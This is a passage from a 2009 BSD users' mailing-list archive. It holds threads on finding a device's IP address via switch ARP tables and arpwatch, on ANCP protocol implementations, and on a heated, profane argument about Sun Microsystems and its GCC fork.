Kosela) Date: Thu, 19 Mar 2009 23:43:07 +0100 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> Message-ID: <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> Miles Nordin wrote: > But yeah, the brilliant work of fresh college grads that made Sun > great in the old days has already been largely squished by this new > regime that insists on pandering to idiot Bank sysadmins, and it > smells liek there's this growing culture of laziness-as-a-virtue > festering in there---like, the Tier 1 phonemonkeys in the call center > seem to be running the entire company, bossing around the developers > to the point they live in fear and create these assertion-riddled > Fisher Price interfaces with binary config files, because they don't > want anything that'll be a ``call generator''. or, maybe the Tier 1 > techs are in fact taking orders from the lunchladies in the cafeteria. > It's structured as one of these ``bottom up'' companies, you know, > because that's how you incubate bold new ideas. Couldn't agree more. Sun nowadays is *definetly* not the same company as when Bill Joy was there. Even Oracle got more fresh ideas than them. --Andy From spork at bway.net Thu Mar 19 18:52:05 2009 From: spork at bway.net (Charles Sprickman) Date: Thu, 19 Mar 2009 18:52:05 -0400 (EDT) Subject: [nycbug-talk] Finding a device's IP address Message-ID: Perhaps a bit OT, but a general question... You have a device on a network that you do not have physical access to. It has an IP address which may or may not be on the subnet it's actually attached to. How do you find what IP is configured? What magic ARP stuff can you spew in it's direction that would perhaps make it respond with something that would give away it's IP? Thanks, Charles From pete at nomadlogic.org Thu Mar 19 19:23:18 2009 From: pete at nomadlogic.org (Pete Wright) Date: Thu, 19 Mar 2009 16:23:18 -0700 Subject: [nycbug-talk] Finding a device's IP address In-Reply-To: References: Message-ID: <12090414-8F87-47F3-A827-A6D3AF34E8AE@nomadlogic.org> On 19-Mar-09, at 3:52 PM, Charles Sprickman wrote: > Perhaps a bit OT, but a general question... > > You have a device on a network that you do not have physical access > to. > It has an IP address which may or may not be on the subnet it's > actually > attached to. > > How do you find what IP is configured? What magic ARP stuff can you > spew > in it's direction that would perhaps make it respond with something > that > would give away it's IP? in the past when i've been in this pickle i logged into a switch i suspected was close to the host in question. found its entry in the arp cache (which was associated w/another switch). connected to that switch, washed hands repeated until i found the subnet that the box was on (in this case our IBM nodes all had a similar range of mac addy's which was sufficiently different than our foundry switches which made things easier). there's even a fun diagram i found online: http://www.networkblueprints.com/troubleshooting/using-mac-address-table-and-arp-cache-lan HTH -p From spork at bway.net Thu Mar 19 19:41:26 2009 From: spork at bway.net (Charles Sprickman) Date: Thu, 19 Mar 2009 19:41:26 -0400 (EDT) Subject: [nycbug-talk] Finding a device's IP address In-Reply-To: <12090414-8F87-47F3-A827-A6D3AF34E8AE@nomadlogic.org> References: <12090414-8F87-47F3-A827-A6D3AF34E8AE@nomadlogic.org> Message-ID: On Thu, 19 Mar 2009, Pete Wright wrote: > On 19-Mar-09, at 3:52 PM, Charles Sprickman wrote: > >> Perhaps a bit OT, but a general question... >> >> You have a device on a network that you do not have physical access to. >> It has an IP address which may or may not be on the subnet it's actually >> attached to. >> >> How do you find what IP is configured? What magic ARP stuff can you spew >> in it's direction that would perhaps make it respond with something that >> would give away it's IP? > > in the past when i've been in this pickle i logged into a switch i suspected > was close to the host in question. found its entry in the arp cache (which > was associated w/another switch). connected to that switch, washed hands > repeated until i found the subnet that the box was on (in this case our IBM > nodes all had a similar range of mac addy's which was sufficiently different > than our foundry switches which made things easier). That's near where I started. I'm thinking that perhaps the switch is a bit wonky, because I've looked at the "port address table" on this HP switch and it just comes up empty, which is annoying: ===========================- TELNET - MANAGER MODE Status and Counters - Port Address Table - Port 11 MAC Address ------------- Nice, huh? > there's even a fun diagram i found online: > http://www.networkblueprints.com/troubleshooting/using-mac-address-table-and-arp-cache-lan Thanks for the pointers... Charles > HTH > -p From robin.polak at gmail.com Thu Mar 19 20:30:18 2009 From: robin.polak at gmail.com (Robin Polak) Date: Thu, 19 Mar 2009 20:30:18 -0400 Subject: [nycbug-talk] Finding a device's IP address In-Reply-To: References: <12090414-8F87-47F3-A827-A6D3AF34E8AE@nomadlogic.org> Message-ID: <551868240903191730o2898ac88rb48f57db5feee13@mail.gmail.com> You could try running arpwatch on a machine in the vlan and identify it that way. On 3/19/09, Charles Sprickman wrote: > On Thu, 19 Mar 2009, Pete Wright wrote: > >> On 19-Mar-09, at 3:52 PM, Charles Sprickman wrote: >> >>> Perhaps a bit OT, but a general question... >>> >>> You have a device on a network that you do not have physical access to. >>> It has an IP address which may or may not be on the subnet it's actually >>> attached to. >>> >>> How do you find what IP is configured? What magic ARP stuff can you spew >>> in it's direction that would perhaps make it respond with something that >>> would give away it's IP? >> >> in the past when i've been in this pickle i logged into a switch i >> suspected >> was close to the host in question. found its entry in the arp cache >> (which >> was associated w/another switch). connected to that switch, washed hands >> repeated until i found the subnet that the box was on (in this case our >> IBM >> nodes all had a similar range of mac addy's which was sufficiently >> different >> than our foundry switches which made things easier). > > That's near where I started. I'm thinking that perhaps the switch is a > bit wonky, because I've looked at the "port address table" on this HP > switch and it just comes up empty, which is annoying: > > ===========================- TELNET - MANAGER MODE > Status and Counters - Port Address Table - Port 11 > > MAC Address > ------------- > > Nice, huh? > >> there's even a fun diagram i found online: >> http://www.networkblueprints.com/troubleshooting/using-mac-address-table-and-arp-cache-lan > > Thanks for the pointers... > > Charles > >> HTH >> -p > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > -- Robin Polak E-Mail: robin.polak at gmail.com V. 917-494-2080 From mspitzer at gmail.com Thu Mar 19 21:12:03 2009 From: mspitzer at gmail.com (Marc Spitzer) Date: Thu, 19 Mar 2009 21:12:03 -0400 Subject: [nycbug-talk] Finding a device's IP address In-Reply-To: References: Message-ID: <8c50a3c30903191812m2325e3fdm47a9465c4b67694a@mail.gmail.com> On Thu, Mar 19, 2009 at 6:52 PM, Charles Sprickman wrote: > Perhaps a bit OT, but a general question... > > You have a device on a network that you do not have physical access to. > It has an IP address which may or may not be on the subnet it's actually > attached to. > > How do you find what IP is configured? ?What magic ARP stuff can you spew > in it's direction that would perhaps make it respond with something that > would give away it's IP? > 1: show arp on the router, even if it is misconfigured, ie wrong subnet. , the ip should still be in the arp table 2: broadcast ping, ie ping 255.255.255.255 and then run arp befor everything times out. or capture w/tcpdump and look at later marc -- Freedom is nothing but a chance to be better. Albert Camus From lego at therac25.net Fri Mar 20 03:54:31 2009 From: lego at therac25.net (Andy Michaels) Date: Fri, 20 Mar 2009 03:54:31 -0400 Subject: [nycbug-talk] GSMP or ANCP implementation on *BSD Message-ID: <47f344f40903200054y44b8f3fem816082fa0add0606@mail.gmail.com> Hello list, I've been doing some work with ANCP lately and have not found any available reference implementations for either client or server. Neither of these protocols seems to have become so widespread yet. Is anyone aware of any activity in these areas? I'm currently creating a very minimal ANCP server in TCL so I can test proprietary client implementations. It would be great to *not* have to buy a router to test out these implementations. Thanks! -Andy From skreuzer at exit2shell.com Fri Mar 20 10:48:15 2009 From: skreuzer at exit2shell.com (Steven Kreuzer) Date: Fri, 20 Mar 2009 10:48:15 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> Message-ID: <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> On Mar 19, 2009, at 6:43 PM, Andy Kosela wrote: > Miles Nordin wrote: > >> But yeah, the brilliant work of fresh college grads that made Sun >> great in the old days has already been largely squished by this new >> regime that insists on pandering to idiot Bank sysadmins, and it >> smells liek there's this growing culture of laziness-as-a-virtue >> festering in there---like, the Tier 1 phonemonkeys in the call center >> seem to be running the entire company, bossing around the developers >> to the point they live in fear and create these assertion-riddled >> Fisher Price interfaces with binary config files, because they don't >> want anything that'll be a ``call generator''. or, maybe the Tier 1 >> techs are in fact taking orders from the lunchladies in the >> cafeteria. >> It's structured as one of these ``bottom up'' companies, you know, >> because that's how you incubate bold new ideas. > > Couldn't agree more. Sun nowadays is *definetly* not the same company > as when Bill Joy was there. Even Oracle got more fresh ideas than > them. You are aware that Sun is the company behind ZFS, DTrace and Niagara right? -- Steven Kreuzer http://www.exit2shell.com/~skreuzer From skreuzer at exit2shell.com Fri Mar 20 10:54:56 2009 From: skreuzer at exit2shell.com (Steven Kreuzer) Date: Fri, 20 Mar 2009 10:54:56 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> Message-ID: <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> On Mar 19, 2009, at 1:54 PM, Miles Nordin wrote: > Have you heard about their frankengcc? It's neat, and I plan to use > it. I also find it HIGHLY offensive, though I guess people who use > *BSD are required to swear loyalty to the BSD license instead of GPL > so you will probably not be offended, but at least you can still > understand, the software Sun has co-opted here is GPL software, so the > authors of the software would probably be offended, and even as BSD > advocates you may agree far enough to empathize for how the author's > intent was frustrated by Sun's sneaky pedantic manoevering: > > http://cooltools.sunsource.net/gcc/ Blame the FSF for Sun having to fork gcc. Unless you are willing to sign over the copyright to any code to you want to submit to any GNU project, they will not accept any patches from you. It makes sense that sun would want to have extensions in gcc for optimizing under SPARC. This way you can have a single build infrastructure and target any architecture. -- Steven Kreuzer http://www.exit2shell.com/~skreuzer From carton at Ivy.NET Fri Mar 20 11:04:53 2009 From: carton at Ivy.NET (Miles Nordin) Date: Fri, 20 Mar 2009 11:04:53 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> (Steven Kreuzer's message of "Fri, 20 Mar 2009 10:54:56 -0400") References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> Message-ID: >>>>> "sk" == Steven Kreuzer writes: >> http://cooltools.sunsource.net/gcc/ sk> Blame the FSF for Sun having to fork gcc. reread what I wrote. I am not complaining about the fork. I'm complaining about their sneaky way of bolting a proprietary piece onto gcc, subverting the authors' reasonable wishes through tricky legal technicalities. sk> It makes sense that sun would want oh, well nevermind then. as long as it makes sense that it would be in their interest, then it's wrong for me to complain about it. wtf?! -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 304 bytes Desc: not available URL: From pete at nomadlogic.org Fri Mar 20 12:22:11 2009 From: pete at nomadlogic.org (Pete Wright) Date: Fri, 20 Mar 2009 09:22:11 -0700 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> Message-ID: <9170ABD5-DD81-499B-8339-88C23AF80A03@nomadlogic.org> On 20-Mar-09, at 8:04 AM, Miles Nordin wrote: >>>>>> "sk" == Steven Kreuzer writes: > >>> http://cooltools.sunsource.net/gcc/ > > sk> It makes sense that sun would want > > oh, well nevermind then. as long as it makes sense that it would be > in their interest, then it's wrong for me to complain about it. wtf?! isn't that what freedom is all about though. being allowed to to something that serves your best interests? or is freedom more like friendly fascism where you can't be trusted to act in a responsible manner *and* look out for your best interests because someone else has already decided what's better for the collective whole...oh god, back to uni. ethics...:) -pete From carton at Ivy.NET Fri Mar 20 14:29:35 2009 From: carton at Ivy.NET (Miles Nordin) Date: Fri, 20 Mar 2009 14:29:35 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: Pete Wright's message of "Fri, 20 Mar 2009 09:22:11 -0700" References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> <9170ABD5-DD81-499B-8339-88C23AF80A03@nomadlogic.org> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> Message-ID: >>>>> "pw" == Pete Wright writes: >>>>> "sk" == Steven Kreuzer writes: sk> You are aware that Sun is the company behind ZFS, DTrace and sk> Niagara right? I question Niagra on your list above, because it is excellent as a software developer's trick, to look at the big picture and realize they could create something competitive within their meager research envelope, by taking advantage of their key asset: a working, ancient CPU design with a miniscule gate count that still has first-rate modern compilers and JRE's targeting it. But as far as teh pinnacle of CPU design the thing is pathetic. It's like (Ultra 10) * 32 + integrated northbridge. It's like some crap Cyrix/Via would come out with to compete with Intel. POWER is AIUI actually a modern design competitive with Itanium, or with whatever CPU is secretly powering the cheap x86 stuff everyone uses (whatever comes after the x86->[mysterycpu] translator blob). But the other buzzwords on your list are pretty solid basic infrastructure, yes, and it seems like there is not so much prominent funded work on basic infrastructure since post-free-software everyone makes money on these little one-off contract jobs, bending existing crap to rather boring day-to-day requriements. Also the scheduler/contract mechanism in Solaris looks like it might be pretty good, And, I haven't used mdb, but I've the impression it's pretty good. They also made some good purchases, like Lustre and VirtualBox. Hopefully they wiill not be infected with Sunculture. I've high hopes for Lustre though I don't know if they are still actually doing work at an enthusiastic pace post-purchase, or if they are like coding for an hour a day and spending the rest of the time arguing on dumb mailing lists or playing fussball . VirtualBox is awesome, and those guys are definitely still hard at work post-purchase. IBM's basic software research is,...may be, similarly impressive, but it's not really cooperating with the free software community so we never see it, and I'm not sure things like LPAR and their weird AS/400 CPUs optimized for running dynamically-typed languages have a better chance of ultimate survival than Sun has. so, yeah, I guess, I agree Sun is one of the last hopes for large and genuinely creative new funded projects. but Sun culture is still kinda fucked. pw> isn't that what freedom is all about though. being allowed to pw> to something that serves your best interests? are you oversimplifying things? maybe just a _little_? yeah, I sort of baited you because I've seen this argument play out wrongly too many times already. pw> friendly fascism where you can't be trusted to act in a pw> responsible manner *and* look out for your best interests where was ``act in a responsible manner'' in your last statement? simplified right out, I think. Personally I find ``trusted to act in a responsible manner'' a bit paternalistic and authoritarian. I do not think my rights and freedoms come from someone more powerful ``trust''ing me not to abuse them. But that shouldn't mean I can't apply pressure to someone who I see making a mess. They can ignore me for a while, until too many people say ``hey, knock it off,'' and at that point if the complainers prevail I think we're generally happy. This is called democracy. It's rather expensive to operate and doesn't function with perfect fairness and is sometimes frustratingly deferential to mediocrity, but it keeps us out from under the thumbs of petty smug arrogant simple-minded autocrats like yourself: When your argument starts with what you imagine are first principles and ends with a heirarchy of incontrovertible authoritarian force, this is no longer a democratic social structure, and the fact so many supposed citizens of the Free World find such structures mysteriously appealing frightens me. I see that Sun is disrespecting the reasonable way with which certain authors to whom I feel solidarity wish to use their copyright. Can I or can I not attack the reputation of the one doing this? I'd like to, because they are _trading_ on that reputation in a big way so I have some hope of success, and attacking it serves my interest. But according to people like you, I am not allowed to push back because they are ``acting in their interest,'' and whenever someone big and rich is acting in their own interest the almighty godlike Invisible Hand is at work, and we'd better all just stay the fuck back and let it work its greedy magic, because THAT is the *core of freedom* and if we did anything else we'd be like Soviet Russia. well, bullSHIT. Where the hell is MY best interest in your world-view? In any case, I can complain about whatever I like. But as I predicted, broke-ass BSD-club pseudoethics tries to stop me at step zero. wake UP, goddamnit. your tiny little libertarian REICH is on fire. YHBT. YHL. HAND. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 304 bytes Desc: not available URL: From pete at nomadlogic.org Fri Mar 20 14:46:47 2009 From: pete at nomadlogic.org (Pete Wright) Date: Fri, 20 Mar 2009 11:46:47 -0700 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> <9170ABD5-DD81-499B-8339-88C23AF80A03@nomadlogic.org> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> Message-ID: <39FB0D56-9C3E-48C5-9D27-F014FBE45D95@nomadlogic.org> On 20-Mar-09, at 11:29 AM, Miles Nordin wrote: >>>>>> "pw" == Pete Wright writes: >>>>>> > > pw> friendly fascism where you can't be trusted to act in a > pw> responsible manner *and* look out for your best interests > > where was ``act in a responsible manner'' in your last statement? > simplified right out, I think. > wow - sorry didn't mean to feed to troll...didn't know he was so hungy... > Personally I find ``trusted to act in a responsible manner'' a bit > paternalistic and authoritarian. I do not think my rights and > freedoms come from someone more powerful ``trust''ing me not to abuse > them. But that shouldn't mean I can't apply pressure to someone who I > see making a mess. They can ignore me for a while, until too many > people say ``hey, knock it off,'' and at that point if the complainers > prevail I think we're generally happy. This is called democracy. > It's rather expensive to operate and doesn't function with perfect > fairness and is sometimes frustratingly deferential to mediocrity, but > it keeps us out from under the thumbs of petty smug arrogant > simple-minded autocrats like yourself: When your argument starts with > what you imagine are first principles and ends with a heirarchy of > incontrovertible authoritarian force, this is no longer a democratic > social structure, and the fact so many supposed citizens of the Free > World find such structures mysteriously appealing frightens me. > > I see that Sun is disrespecting the reasonable way with which certain > authors to whom I feel solidarity wish to use their copyright. Can I > or can I not attack the reputation of the one doing this? I'd like > to, because they are _trading_ on that reputation in a big way so I > have some hope of success, and attacking it serves my interest. > > But according to people like you, I am not allowed to push back > because they are ``acting in their interest,'' and whenever someone > big and rich is acting in their own interest the almighty godlike > Invisible Hand is at work, and we'd better all just stay the fuck back > and let it work its greedy magic, because THAT is the *core of > freedom* and if we did anything else we'd be like Soviet Russia. > > well, bullSHIT. > > Where the hell is MY best interest in your world-view? > > In any case, I can complain about whatever I like. > > But as I predicted, broke-ass BSD-club pseudoethics tries to stop me > at step zero. wake UP, goddamnit. your tiny little libertarian REICH > is on fire. > > YHBT. YHL. HAND. > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk -------------- next part -------------- An HTML attachment was scrubbed... URL: From carton at Ivy.NET Fri Mar 20 16:19:04 2009 From: carton at Ivy.NET (Miles Nordin) Date: Fri, 20 Mar 2009 16:19:04 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: <39FB0D56-9C3E-48C5-9D27-F014FBE45D95@nomadlogic.org> (Pete Wright's message of "Fri, 20 Mar 2009 11:46:47 -0700") References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> <9170ABD5-DD81-499B-8339-88C23AF80A03@nomadlogic.org> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> <39FB0D56-9C3E-48C5-9D27-F014FBE45D95@nomadlogic.org> Message-ID: >>>>> "pw" == Pete Wright writes: pw> didn't mean to feed to troll... like i said... YHBT. YHL. HAND. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 304 bytes Desc: not available URL: From mspitzer at gmail.com Fri Mar 20 22:44:42 2009 From: mspitzer at gmail.com (Marc Spitzer) Date: Fri, 20 Mar 2009 22:44:42 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: References:

<49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com>